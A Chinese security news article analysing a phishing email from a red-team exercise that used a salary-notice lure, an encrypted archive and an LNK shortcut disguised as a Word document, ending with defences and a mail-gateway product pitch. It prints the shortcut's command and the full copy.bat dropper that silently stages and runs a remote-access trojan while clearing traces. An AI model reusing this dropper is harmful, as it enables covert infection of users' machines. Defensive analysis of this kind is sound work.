【年度典型案例】诡计多端!攻防演练中攻击队的神秘布局
2024-5-22 15:18:43 Author: www.4hou.com(查看原文) 阅读量:14 收藏

CACTER 行业 刚刚发布

1671

收藏

导语:揭秘攻击队病毒邮件攻击手法及企业防护策略!

随着网络安全的重要性日益得到重视,网络安全实战攻防演练日益普及,其规模与覆盖面均逐年增长。

在攻防演练中,攻击方非常热衷于通过钓鱼、病毒邮件进行“打点”,利用远控木马获取目标企业员工终端权限,从而打开渗透企业内网的突破口。

真实案例分析

这是2023年某大型网络安全攻防演练中Coremail捕获到的来自攻击队的真实邮件。邮件以员工最关心薪酬通知为话题,引诱用户打开附件。攻击队还注册了近似的域名进行域名仿冒,以迷惑用户。

图片 1.png

附件为一个加密压缩包,通过加密的方式防止邮件安全网关反病毒查杀。解压后为一个快捷方式文件和一个隐藏文件夹。

图片 2.png

注意!windows lnk文件默认不显示后缀的特性,使其看起来非常像一个doc文档。

图片 3.png

用户一旦打开此快捷方式文件,就会执行以下命令:

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c ".\__M\.DOCX\copy.bat" && exit

图片 4.png

命令执行的结果就是运行隐藏文件夹中的 Copy.bat 脚本。Copy.bat脚本执行的内容如下:

cmd /c xcopy /h /y %cd%\__M\.DOCX\DS %temp%\

attrib -s -a -h %temp%\DS

rename %temp%\DS sihost.exe

attrib -s -a -h %cd%\__M\.DOCX\DS

del "%cd%\__M\.DOCX\DS"

attrib -s -a -h %cd%\__M\.DOCX\copy.bat

del *.lnk

copy %cd%\__M\.DOCX\员工工资变动申请表.doc %cd%\员工工资变动申请表.doc

start %cd%\员工工资变动申请表.doc

start %temp%\sihost.exe

del /s /q /f %0

Copy.bat脚本功能是把同文件夹下的DS文件拷贝到临时文件夹并重命名为ihost.exe,并且运行。ihost.exe是最终的恶意载荷,是一个远控木马,也做了免杀处理。运行木马后,bat脚本将删除DS和lnk文件,以清理痕迹,同时打开一个无害的doc文档,以便迷惑用户。

最终用户在完全不知情的情况下被植入了远控木马,攻击者利用远控密码可以持续监听用户口令以及查看用户本地文件。

攻击手法分析

01、话题吸睛

攻击队病毒邮件往往使用“薪酬通知”“安全监测工具”“实名举报”等吸引人的话题,引诱员工打开附件。

02、加密压缩

加密压缩是攻击队最喜欢的免杀方式,这种方式简单有效,可以绕过大部分杀毒引擎的查杀。

03、通过多文件相互调用反沙箱

此案例中的病毒附件由多个文件相互调用,lnk、bat文件均不带有恶意载荷,DS文件运行前没有后缀。攻击队通过这样的组合,使得每个单一文件在沙箱中均不会报毒。

04、多重伪装

结合了近似域名仿冒、lnk文件伪装doc文件、ihost.exe伪装系统进程等多种方式混淆视听,避免被用户察觉。

防护方案

·使用CACTER邮件安全网关的加密附件隔离审核功能,可以有效识别带有加密附件的邮件,可以对加密附件邮件进行隔离和审核。

·使用CACTER邮件安全网关的加密附件深度分析功能,可以从邮件正文智能提取解压口令,对附件进行解压后进一步进行查杀。

·定期开展钓鱼演练,对员工做好安全意识培训,提高员工的安全意识水平。

在网络安全攻防演练中,攻击方的策略和技巧不断演变,使得防御工作充满挑战。通过深入分析攻击手法并采取有效的防护措施,可以提高企业的网络安全防护能力。

如若转载,请注明原文地址

  • 分享至

取消 嘶吼

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟


文章来源: https://www.4hou.com/posts/DZBy
如有侵权请联系:admin#unsafe.sh